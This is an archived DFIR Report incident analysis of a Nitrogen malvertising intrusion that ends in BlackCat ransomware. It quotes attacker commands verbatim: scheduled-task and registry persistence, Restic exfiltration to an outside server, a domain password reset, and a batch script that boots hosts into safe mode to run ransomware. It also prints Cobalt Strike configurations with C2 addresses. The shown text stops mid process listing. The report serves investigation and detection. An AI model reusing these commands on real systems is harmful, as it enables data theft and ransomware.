{
	"id": "e1b7f4f0-84e2-41df-aa8e-93ba52e785ac",
	"created_at": "2026-04-06T00:07:57.859698Z",
	"updated_at": "2026-04-10T13:12:12.974756Z",
	"deleted_at": null,
	"sha1_hash": "2d2b97a37fe5e90dcb511358ef5c177899f5f5f1",
	"title": "Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8425150,
	"plain_text": "Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware\r\n- The DFIR Report\r\nBy editor\r\nPublished: 2024-09-30 · Archived: 2026-04-05 12:57:08 UTC\r\nKey Takeaways\r\nIn November 2023, we identified a BlackCat ransomware intrusion started by Nitrogen malware hosted on a website\r\nimpersonating Advanced IP Scanner.\r\nNitrogen was leveraged to deploy Sliver and Cobalt Strike beacons on the beachhead host and perform further\r\nmalicious actions. The two post-exploitation frameworks were loaded in memory through Python scripts.\r\nAfter obtaining initial access and establishing further command and control connections, the threat actor enumerated\r\nthe compromised network with the use of PowerSploit, SharpHound, and native Windows utilities. Impacket was\r\nemployed to move laterally, after harvesting domain credentials.\r\nThe threat actor deployed an open-source backup tool called Restic on a file server to exfiltrate share data to a remote\r\nserver.\r\nEight days after initial access, the threat actor modified a privileged user password and deployed BlackCat\r\nransomware across the domain using PsExec to execute a batch script.\r\nSix rules were added to our Private Ruleset related to this intrusion.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon. \r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, opendir reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. 
Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for pricing or a demo!\r\nTable of Contents:\r\nCase Summary\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 1 of 37\n\nCase Summary\r\nThe incident began when a user unknowingly downloaded a malicious version of Advanced IP Scanner from a fraudulent\r\nwebsite that mimicked the legitimate one, leveraging Google ads to rank higher in search results. Analysis of the attack\r\npattern and loader signature suggests this was part of a Nitrogen campaign, consistent with previous public reports. The\r\ncompromised installer came as a ZIP file, which the victim extracted before launching the embedded executable, triggering\r\nthe infection.\r\nThe executable was a legitimate Python binary, which side-loaded a modified Python DLL specifically designed to execute\r\nNitrogen code. This process then dropped a Sliver beacon in an AppData subfolder named “Notepad.” All malware deployed\r\nduring the intrusion was obfuscated using Py-Fuscate to conceal malicious Python scripts. About eight minutes after the\r\nNitrogen execution, the attacker initiated hands-on keyboard discovery, utilizing Windows utilities such as net, ipconfig, and\r\nnltest. 
Two minutes later, additional Sliver beacons were deployed on the compromised host, with persistence established\r\nthrough scheduled tasks and registry key modifications.\r\nA little over an hour after the initial execution, the threat actor deployed additional malware, this time Cobalt Strike beacons,\r\nagain wrapped in the Py-Fuscate obfuscation technique. The discovery phase continued with detailed enumeration of the\r\nActive Directory domain, including local and domain administrators, domain controllers, and computers. To deepen their\r\nunderstanding of the environment, the attacker utilized tools such as SharpHound and PowerSploit. The Cobalt Strike\r\nbeacon was then used to dump domain credentials from LSASS, granting the attacker local admin credentials with broad\r\naccess across the network.\r\nUsing the stolen credentials, the threat actor leveraged Impacket’s wmiexec to move laterally to a server, where they used\r\ncurl to download a ZIP file containing their tools. After extracting the archive, they repeated the same persistence techniques\r\nobserved on the beachhead, creating scheduled tasks and modifying registry keys. The attacker then targeted a second\r\nserver, replicating the same steps to deploy their tools and maintain persistence. Shortly after, a second credential dump was\r\nperformed, again targeting LSASS memory. Following this, the threat actor began using a domain administrator account,\r\nindicating they likely obtained those credentials during this phase.\r\nThe threat actor continued their lateral movement, replicating the same actions on both a file server and a backup server.\r\nApproximately six hours after gaining initial access, they deployed the open-source backup tool Restic on the file server.\r\nUsing Restic, the attacker exfiltrated data from the file shares to a remote server located in Bulgaria. 
After this, the hands-on\r\nactivity significantly decreased and remained largely silent until the seventh day.\r\nOn the seventh day, the threat actor logged into the backup server and accessed the backup console. No further actions were\r\nobserved, leading us to assess that this was likely a discovery effort aimed at understanding the backup configurations.\r\nOn the eighth day, the threat actor shifted to their final objectives. They identified the domain controllers and used xcopy\r\nfrom their initial lateral movement server to transfer tools to one of the domain controllers, executing them remotely via\r\nWMIC. Next, they ran a batch script on the domain controller using PSEXEC, targeting a privileged backup service account,\r\nwhich changed that account's credentials. From the staging server, the attacker began distributing the BlackCat ransomware\r\nbinary across the network using SMB and the Windows copy utility. This was followed by executing another batch script via\r\nPSEXEC on multiple remote hosts, initiating the ransomware deployment.\r\nThe final script executed a series of actions on remote hosts, including configuring them to start in Safe Mode with\r\nNetworking and setting a registry run key to launch the ransomware binary upon reboot. It also set the compromised backup\r\nservice account to auto-login using Winlogon, and then forced a system reboot. As a result, the hosts rebooted into Safe\r\nMode, where the ransomware was automatically executed. This led to file encryption across the affected systems, with the\r\nransomware leaving a note on each host. 
The Time to Ransomware (TTR) was approximately 156 hours, spanning over\r\neight calendar days.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by Angelo Violetti, @0xtornado (LinkedIn) and\r\n.\r\nInitial Access\r\nDrive-by Compromise\r\nBased on threat intelligence sources and the file name, we are highly confident that the threat actors accessed the victim’s\r\ninfrastructure through a Nitrogen campaign, which delivered a ZIP file via malicious Google ads (i.e., malvertising).\r\nNitrogen is known for leveraging legitimate utilities like Advanced IP Scanner, PuTTY, etc. to conceal malware. The\r\nfollowing graph shows the Nitrogen infection chain and how it executed Sliver.\r\nThe ZIP file named Version.zip mainly contained:\r\na legitimate Python executable named setup.exe, which was run by the victim.\r\ntwo hidden Python DLLs.\r\nUpon execution of setup.exe, the following actions were performed:\r\nThe hidden python311.dll was loaded (DLL sideloading) and the Nitrogen code was launched.\r\nA legitimate copy of Advanced IP Scanner was copied into the %Public%\\Downloads folder.\r\npython.exe, pycryptodome, and a Sliver beacon were placed into a folder named %AppData%\\Notepad.\r\nThe Sliver beacon was executed through a Python script named slv.py, which decrypts an AES-encrypted DLL\r\n(data.aes) and loads it into memory.\r\nAdvanced IP Scanner was installed on the compromised system.\r\nA very similar campaign was reported by @dipotwb on Twitter. 
We also observed overlap with campaigns reported by\r\neSentire.\r\nExecution\r\nA few minutes later, the threat actor deployed Python scripts on the beachhead, serving as loaders for both Sliver and Cobalt\r\nStrike.\r\nThe following image shows the sequence of beacons executed on the beachhead host.\r\nSliver\r\nThe Python script, slv.py, used to load Sliver into memory, was heavily obfuscated. However, buried within thousands of\r\nlines of code was the critical section responsible for executing the Sliver beacon.\r\nBased on the analysis of these artifacts, it appears the Sliver payload was likely obfuscated using Py-Fuscate, as the tool’s\r\nencode function mirrored the same imports and procedures found in the obfuscated script, effectively concealing the\r\nmalicious code.\r\nThe Sliver execution revealed multiple interesting debugging strings. In the first instance, Windows API functions’ addresses\r\nare resolved.\r\nSubsequently, the Sliver DLL is injected in memory and the DLL entrypoint is called.\r\nThose debugging strings are the same ones used by Pyramid in the pythonmemorymodule, which is a module used to inject\r\nand execute DLLs in memory.\r\nBy analyzing the python.exe process memory, it was possible to notice the DLL injected in the memory sections previously\r\ndescribed in the debugging strings.\r\nThe Sliver DLL exports multiple functions; however, StartW is the one that runs the beacon.\r\nMultiple strings related to Sliver were found in the process memory.\r\nCobalt 
Strike\r\nwo14.py is another highly obfuscated Python script that acts as a loader for custom shellcode. In this specific case, the threat\r\nactor specified an AES-encrypted Cobalt Strike shellcode which is:\r\nDecrypted through the key “we3p2v5t85”.\r\nCopied into a newly allocated memory region in the heap.\r\nExecuted by invoking the function CreateThread.\r\nwo12.py has the same behavior.\r\nThe Sysmon Event ID 10 shows the self-injection technique performed by the Python Cobalt Strike loader.\r\nPersistence\r\nScheduled Task\r\nDuring the intrusion, the threat actor created multiple scheduled tasks to achieve persistence. This persistence technique was\r\nabused on the beachhead host and on each host they moved to laterally during the first day.\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr C:\\Users\\REDACTED\\AppData\\Loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\users\\REDACTED\\appdata\\loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr C:\\Users\\REDACTED\\AppData\\Loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security 
Task-S-1-5-21-REDACTED\" /tr c:\\users\\REDACTED\\appdata\\loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /I 1 /TR C:\\Users\\REDACTED\\AppData\\Local\\Notepad\\UpdateEG.bat /TN UpdateEdge /SC ONIDLE\r\nHowever, some of them contained mistakes and therefore did not work correctly.\r\nFor example, in the following task, the threat actor didn’t specify the “\\” between “C:” and the executable name.\r\nschtasks /create /I 1 /TR C:WindowsTempUpdate.exe /TN UpdateEdge /SC ONIDLE\r\nWhile some tasks used the ‘ONSTART’ option to enable persistence after reboot, some used a time frame to execute every\r\n720 minutes. For example, on a server the threat actor dropped a BAT file named UpdateEdge.bat and subsequently created\r\ntwo scheduled tasks using this option.\r\nRegistry Key\r\nTo ensure persistence on the beachhead host and three servers, the threat actor added an entry in the Winlogon\\Userinit\r\nregistry key to ensure the execution of UpdateEdge.bat whenever a user logs into the systems.\r\ncmd.exe /C reg add \"HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon\" /v UserInit /t reg_sz /d \"c:\\w\r\nPrivilege Escalation\r\nOn the beachhead system, the initial payload setup.exe was executed with a High integrity level, which means that the binary\r\nwas run with an access level equivalent to Administrator access.\r\nAn injected cmd.exe process from the beachhead host opened winlogon.exe with an access mask of 0x143A, which, when\r\ndecoded, revealed the PROCESS_VM_WRITE permission. 
The cmd.exe process then executed process injection into\r\nwinlogon.exe.\r\nAll scheduled tasks created by the threat actor were set up to run in the SYSTEM context, ensuring that access would stay\r\nelevated on hosts.\r\nDefense Evasion\r\nNitrogen\r\nBy analyzing the modified Python DLL (python311.dll), we noticed multiple defense evasion capabilities implemented,\r\nsuch as:\r\nRemoving hooks from Windows API functions.\r\nObfuscating the payload in memory (i.e., Sleep Obfuscation).\r\nBypassing AMSI, WLDP, and ETW.\r\nBased on code overlaps, those techniques could have been copied from the following GitHub repositories:\r\nAntimalware-Research/Generic/Userland Hooking/AntiHook at master · NtRaiseHardError/Antimalware-Research ·\r\nGitHub\r\nGitHub – RtlDallas/KrakenMask: Sleep obfuscation\r\ndonut/loader/bypass.c at master · TheWover/donut · GitHub\r\nPatching WLDP · GitHub\r\nAn example of code overlap is shown in the following image related to the IsHooked() function.\r\nMasquerading\r\nWith the aim of blending the malicious activities into normal system events, the threat actor masqueraded both the initial\r\npayload and the persistence mechanisms by:\r\nRenaming python.exe to setup.exe.\r\nNaming the scheduled tasks to mirror OneDrive and Microsoft Edge.\r\nRenaming the Python executable used to run their Python stagers for Sliver and Cobalt Strike.\r\nProcess injection\r\nThe threat actor was observed injecting into various processes during the intrusion. 
One specific occasion was during the\r\nelevation to SYSTEM on the beachhead host.\r\nClearing logs\r\nExecution of the ransomware payload included clearing of various event logs while the hosts were in safe mode.\r\nSafeboot\r\nBefore executing the final ransomware, the threat actor set all hosts to restart in safe mode with networking. This can be used\r\nto prevent antivirus or other preventative tools from stopping the ransomware execution, as many won’t start when a host is\r\nbooted in safe mode. It has been used by several ransomware families.\r\nCredential Access\r\nTwo hours after initial access, the threat actor utilized Cobalt Strike’s credential dumping functionalities to access the\r\nLSASS process on the beachhead host. This provided them access to a shared local administrator account. Around two hours\r\nafter that, having landed on a server during lateral movement activity, the threat actor was again seen accessing LSASS. 
After this, we\r\nobserved the use of a domain administrator account, indicating this second access likely delivered those credentials.\r\nDiscovery\r\nSliver\r\nA few minutes after its execution, Sliver launched the following commands to enumerate:\r\nLocal and domain admins.\r\nDomain computers.\r\nActive Directory trusts.\r\nNetwork adapters.\r\nnet group \"domain admins\" /domain\r\nipconfig /all\r\nnltest /domain_trusts\r\nnet localgroup administrators\r\nnet group \"Domain Computers\" /domain\r\nCobalt Strike\r\nAs with Sliver, Cobalt Strike was utilized to perform hands-on keyboard discovery activities.\r\ncmd.exe /C net group \"Domain controllers\" /DOMAIN\r\ncmd.exe /C net group \"domain admins\" /DOMAIN\r\ncmd.exe /C net localgroup Administrators\r\ncmd.exe /C net group /Domain\r\ncmd.exe /C net group \"Domain Computers\" /DOMAIN\r\nPowerView\r\nOn the beachhead host, the threat actor loaded PowerView in memory to perform further discovery activities. 
This specific\r\naction was identified through PowerShell Script Block Logging.\r\nPowerView was used to:\r\nGather the local admins.\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread\r\nExtract the servers in the environment.\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:54350/'); Get-DomainComputer -OperatingSystem\r\nBloodHound\r\nThe $MFT also showed that, in the first phases of the intrusion, the threat actor performed a BloodHound collection, likely to\r\nidentify paths to escalate privileges to domain admin.\r\nLateral Movement\r\nRemote Desktop Protocol\r\nOn the first day of the intrusion, four hours after the Nitrogen execution, the threat actor started interacting with other\r\nsystems such as a file server through a Cobalt Strike beacon which was injected into winlogon.exe.\r\nWindows Management Instrumentation (WMI)\r\nFour hours after initial access, the threat actor moved laterally to a server using Impacket’s wmiexec and downloaded a ZIP\r\nfile containing Python and a Cobalt Strike beacon (wo12.py and wo14.py).\r\nPass the Hash\r\nDuring the intrusion, we observed three instances of possible pass-the-hash activity in the logs. 
These involved instances\r\nwhere the threat actor appeared to be moving from the SYSTEM context to a domain administrator account.\r\nSMB Admin Shares\r\nWhile some of the threat actor’s payloads were downloaded from a remote resource, they also at times transferred their\r\ntooling laterally using SMB, and then executed it using WMIC or wmiexec.\r\nCommand and Control\r\nOver the course of the intrusion, the threat actor relied on Sliver and Cobalt Strike. Sliver was used most heavily during the\r\nfirst day of the intrusion, with Cobalt Strike then being used over the full length of the intrusion.\r\nCobalt Strike\r\nIP Port Ja3 Ja3s ASN Org ASN\r\n91.92.250.65 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7 LIMENET 394,711\r\n91.92.250.60 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7 LIMENET 394,711\r\nwo14.py Cobalt Strike configuration.\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 38500\r\nMaxGetSize - 13982519\r\nJitter - 27\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - 1329384dfdcfde2228da94e2a042f2b4\r\nC2Server - 91.92.250.65,/broadcast\r\nUserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, lik\r\nHttpPostUri - /1/events/com.amazon.csm.csa.prod\r\nMalleable_C2_Instructions - Remove 1308 bytes from the end\r\n Remove 1 bytes from the end\r\n Remove 194 bytes from the beginning\r\n Base64 decode\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: application/json, text/plain, */*\r\n Accept-Language: en-US,en;q=0.5\r\n Origin: https://www.amazon.com\r\n Referer: https://www.amazon.com\r\n Sec-Fetch-Dest: empty\r\n Sec-Fetch-Mode: 
cors\r\n Sec-Fetch-Site: cross-site\r\n Te: trailers\r\n Metadata\r\n base64\r\n header \"x-amzn-RequestId\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: */*\r\n Origin: https://www.amazon.com\r\n SessionId\r\n base64url\r\n header \"x-amz-rid\"\r\n Output\r\n base64url\r\n prepend \"{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"app\r\n append \"\"\r\n\"\r\n append \"\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate.exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - 3Hh1YX4vT3i5C7L2sn7K4Q==\r\nWatermark - 587247372\r\nbStageCleanup - True\r\nbCFGCaution - True\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 16700\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll.dll:RtlUserThreadStart\r\n SetThreadContext\r\n NtQueueApcThread-s\r\n kernel32.dll:LoadLibraryA\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - False\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - 
Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nwo12.py Cobalt Strike configuration.\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 38500\r\nMaxGetSize - 13982519\r\nJitter - 27\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - f27a9b7c29960aaf911f2885b40536c2\r\nC2Server - 91.92.250.60,/broadcast\r\nUserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, lik\r\nHttpPostUri - /1/events/com.amazon.csm.csa.prod\r\nMalleable_C2_Instructions - Remove 1308 bytes from the end\r\n Remove 1 bytes from the end\r\n Remove 194 bytes from the beginning\r\n Base64 decode\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: application/json, text/plain, */*\r\n Accept-Language: en-US,en;q=0.5\r\n Origin: https://www.amazon.com\r\n Referer: https://www.amazon.com\r\n Sec-Fetch-Dest: empty\r\n Sec-Fetch-Mode: cors\r\n Sec-Fetch-Site: cross-site\r\n Te: trailers\r\n Metadata\r\n base64\r\n header \"x-amzn-RequestId\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: */*\r\n Origin: https://www.amazon.com\r\n SessionId\r\n base64url\r\n header \"x-amz-rid\"\r\n Output\r\n base64url\r\n prepend \"{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"app\r\n append \"\"\r\n\"\r\n append \"\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate.exe\r\nSpawnto_x64 - 
%windir%\\sysnative\\gpupdate.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - 3Hh1YX4vT3i5C7L2sn7K4Q==\r\nWatermark - 587247372\r\nbStageCleanup - True\r\nbCFGCaution - True\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 16700\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll.dll:RtlUserThreadStart\r\n SetThreadContext\r\n NtQueueApcThread-s\r\n kernel32.dll:LoadLibraryA\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - False\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nThe two Cobalt Strike C2 servers returned the classic HTTP response associated with the post-exploitation framework:\r\nHTTP/1.1 404 Not Found\r\nContent-Type: text/plain\r\nDate: Day, DD Mmm YYYY HH:MM:SS GMT\r\nContent-Length: 0\r\nBy diving deeper into the two command and control servers, it was noticed that both of them exposed an HTTP service on\r\nport 81 with the following HTTP response.\r\nTherefore, the following FOFA query was built to identify further potential C2 servers matching this pattern.\r\n\"HTTP/1.1 307 Temporary Redirect\" \u0026\u0026 \"Content-Type: text/html; charset=utf-8\" 
\u0026\u0026 \"Location: https://www.cloudf\r\nSome of the first results provided by FOFA via the above-mentioned query were reported by Rapid7 in one of their latest\r\nblog posts.\r\nBased on FOFA results, all the identified command and control servers were in Bulgaria and the Netherlands.\r\nFurthermore, we noticed that four IP addresses (91.92.250.158, 91.92.251.240, 94.156.67.175, 94.156.67.180) had an\r\nuntrusted certificate on port 441 with protocol HTTPS associated with Alibaba, when they were active Cobalt Strike servers.\r\nThe certificate serial number (1657766544761773100) was used to identify other servers possibly used by the same threat actors,\r\nand further servers were detected which showed a behavior similar to what was previously described. 
For example, the IP\r\naddress 185.73.124.238 shares the same certificate and is, at the time of report writing, an active Cobalt Strike C2 server.\r\nAs described in a Hunt.io blog post, these specific certificate attributes like CommonName and Organization are associated\r\nwith the usage of RedGuard, which is a C2 redirector.\r\nSliver\r\nIP Port Ja3 Ja3s ASN Org ASN\r\n194.49.94.18 8443 19e29534fd49dd27d09234e639c4057e f4febc55ea12b31ae17cfb7e614afda8 Matrix Telecom Ltd 216,419\r\n194.169.175.134 8443 d6828e30ab66774a91a96ae93be4ae4c f4febc55ea12b31ae17cfb7e614afda8 Matrix Telecom Ltd 216,419\r\nBoth the Sliver servers 194.49.94[.]18 and 194.169.175[.]134 had invalid certificates on port 8443.\r\nExfiltration\r\nThe threat actor used Restic to exfiltrate directories directly from a file server. Below are the commands used by the threat\r\nactor to initialize the backup repository and exfiltrate the data:\r\nrestic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt\r\nrestic.exe -r rest:http://195.123.226.84:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup \"F:\\\r\nThe threat actor exfiltrated the data over HTTP to a server hosted on 195.123.226[.]84. The different parameters used by the\r\nthreat actor are:\r\n“-r rest”: The -r option is used to specify the location of the repository where the backup data will be stored; this can\r\nbe anything from an S3 bucket to an SFTP server. 
In this case, the threat actor used a REST server.\r\n“--password-file”: This option grabs the backup password from a file, in this case ppp.txt.\r\n“--use-fs-snapshot”: This option will use the Windows Volume Shadow Copy Service (VSS) for creating backups.\r\nRestic, according to the documentation, will transparently create a VSS snapshot for each volume that contains files\r\nto back up. Files are read from the VSS snapshot instead of the regular filesystem. This allows backing up files that are\r\nexclusively locked by another process during the backup.\r\n“--verbose”: This option is used to print a live status of the backup or the processed files.\r\nThe traffic related to this activity triggered the following Suricata alert: ET USER_AGENTS Go HTTP Client User-Agent.\r\nInvestigating the Suricata EVE flow logs would reveal the usage of Restic thanks to the Content-Type HTTP header:\r\nhttp: {\r\nprotocol: \"HTTP/1.1\",\r\nhttp_content_type: \"application/vnd.x.restic.rest.v2\"\r\n}\r\nImpact\r\nThe threat actor dropped and executed two batch scripts, up.bat and 1.bat, remotely using PsExec on targeted servers to\r\nperform various operations.\r\nThe up.bat script was executed remotely on a domain controller using the following command:\r\ncmd.exe /C PsExec64.exe -accepteula \\\\\u003cDOMAIN-CONTROLLER-IP\u003e -c -f -d -s up.bat\r\nThe script contained a one-liner to reset the password of a privileged service account:\r\nnet user REDACTED JapanNight!128 /domain\r\nThe threat actor executed the following command to remotely copy the ransomware binary to the target machines before\r\nrunning the second batch script:\r\ncmd.exe /C for /f %a in (pc.txt) do copy /y \\\\\u003cREDACTED\u003e\\c$\\\u003cREDACTED\u003e.exe \\\\%a\\c$\\\u003cREDACTED\u003e.exe\r\nThe second script, 1.bat, was then executed on multiple hosts using the following command:\r\ncmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat\r\nThe script contained the following commands:\r\nbcdedit 
/set {default} safeboot network\r\nfindstr /C:\"The operation completed successfully.\"\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce /v *a /t REG_SZ /d \"cmd.exe /c C:\\\u003cREDACTED-CO\r\nfindstr /C:\"The operation completed successfully.\"\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultUserName /t REG_SZ /d \u003cREDACTE\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultPassword /t REG_SZ /d JapanNig\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f\r\ntimeout /T 10\r\nshutdown -r -t 0\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 28 of 37\n\nThe above commands were meant to preform the following operations:\r\nThe first command uses bcdedit utility to modify and set the default boot configuration of the system to the “safe\r\nmode with networking”.\r\nThe second command is using findstr to check if the previous command executed successfully.\r\nThe following reg commands are used to modify the registry and enable automatic logon using the service account,\r\nand add the ransomware binary \u003cREDACTED-COMPANY-NAME\u003e.exe to\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce to be executed on system’s start up.\r\nThe last commands are used to initiate an immediate system restart after a 10 second delay.\r\nThe ransomware binary \u003cREDACTED-COMPANY-NAME\u003e.exe executed multiple files and utilities, below are the child\r\nand grand child processes showing the behavior of this ransomware binary:\r\nC:\\\u003cREDACTED-COMPANY-NAME\u003e.exe\r\n----\u003e C:\\example.exe C:\\example.exe --access-token REDACTED --safeboot-network\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Sa\r\n--------\u003e C:\\Windows\\System32\\cmd.exe 
